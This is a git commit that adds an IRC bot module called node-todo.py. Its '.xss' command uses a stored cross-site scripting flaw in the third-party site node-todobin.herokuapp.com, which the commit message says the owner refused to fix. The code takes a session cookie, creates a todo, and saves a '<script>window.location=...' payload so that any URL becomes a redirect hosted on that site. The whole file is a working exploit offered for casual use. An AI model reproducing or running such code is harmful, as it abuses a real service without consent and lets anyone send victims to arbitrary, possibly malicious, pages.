Added url shortener using xss vulnerablity that owner refused to fix.

2012-02-12 04:32:16 -05:00 · 2012-02-12 04:32:16 -05:00 · eba2e5b8a3
parent 3203eae258
commit eba2e5b8a3
1 changed files with 69 additions and 0 deletions
--- a/modules/node-todo.py
+++ b/modules/node-todo.py
@ -0,0 +1,69 @@
+#!/usr/bin/python3
+"""
+node-todo.py - node-todo uploader
+author: mutantmonkey <mutantmonkey@mutantmonkey.in>
+author: telnoratti <calvin@winkowski.me>
+"""
+
+from urllib.error import HTTPError
+from urllib import request
+import web
+import json
+
+def xss(phenny, input):
+    """.xss <url> - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
+
+    url = input.group(2)
+    if not url:
+        phenny.reply("No URL provided.")
+        return
+
+    if not url.startswith('http'):
+        url = ''.join(['http://', url])
+
+    try:
+        url = urlshortener(url)
+    except (HTTPError, IOError):
+        phenny.reply("THE INTERNET IS FUCKING BROKEN. Please try again later.")
+        return
+    
+    phenny.reply(url)
+xss.rule = (['xss'], r'(.*)')
+
+
+
+def urlshortener(longurl):
+    xss = ''.join(["""{"status":false,"text":"<script>window.location='""", longurl, """'</script>"}"""])
+    xss = xss.encode()
+    r = request.urlopen('http://node-todobin.herokuapp.com/list')
+    cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
+
+    r = request.Request('http://node-todobin.herokuapp.com/api/todos', 
+        headers={
+            'Content-Type': 'application/json',
+            'Accept': 'application/json, text/javascript, */*',
+            'Cookie': cookie,
+        }, data=b'{"id":null}')
+    opener = request.build_opener(request.HTTPHandler)
+    response = opener.open(r)
+    data = response.read()
+    js = json.loads(data.decode('utf-8'))
+    uri = js.get('uri')
+    url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
+    newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
+
+    request.urlopen(url)
+    request.urlopen(newurl)
+    r = request.Request(url, 
+        headers={
+            'Content-Type': 'application/json',
+            'Accept': 'application/json, text/javascript, */*',
+            'Cookie': cookie,
+        }, data=xss)
+    
+    opener.open(r)
+
+    return newurl
+
+if __name__ == '__main__':
+    print(__doc__.strip())